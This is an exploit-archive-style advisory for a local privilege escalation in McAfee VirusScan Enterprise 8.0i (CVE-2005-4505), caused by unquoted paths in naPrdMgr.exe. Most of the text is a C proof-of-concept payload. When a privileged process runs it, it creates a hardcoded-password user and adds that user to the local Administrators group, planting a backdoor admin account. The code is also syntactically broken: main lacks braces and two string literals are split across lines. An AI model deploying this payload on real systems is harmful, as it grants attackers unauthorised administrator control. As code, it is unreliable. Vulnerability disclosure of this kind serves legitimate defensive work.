McAfee VirusScan 8.0 - Path Specification Privilege Escalation

Related Vulnerabilities: CVE-2005-4505  
Publish Date: 22 Dec 2005
Author: Reed Arvin


McAfee VirusScan is prone to a vulnerability that could allow an arbitrary file to be executed.

The 'naPrdMgr.exe' process calls applications without using properly quoted paths. Successful exploitation may allow local attackers to gain elevated privileges.

McAfee VirusScan Enterprise 8.0i (patch 11) is reportedly vulnerable. Other versions may be affected as well. 

// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>

INT main( VOID )
    CHAR  szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

     GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program
Pr0gr@m$$ /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup
Administrators Program /add", szWinDir );

    system( szCmdLine );

    return 0;
// ===== End Program.c ======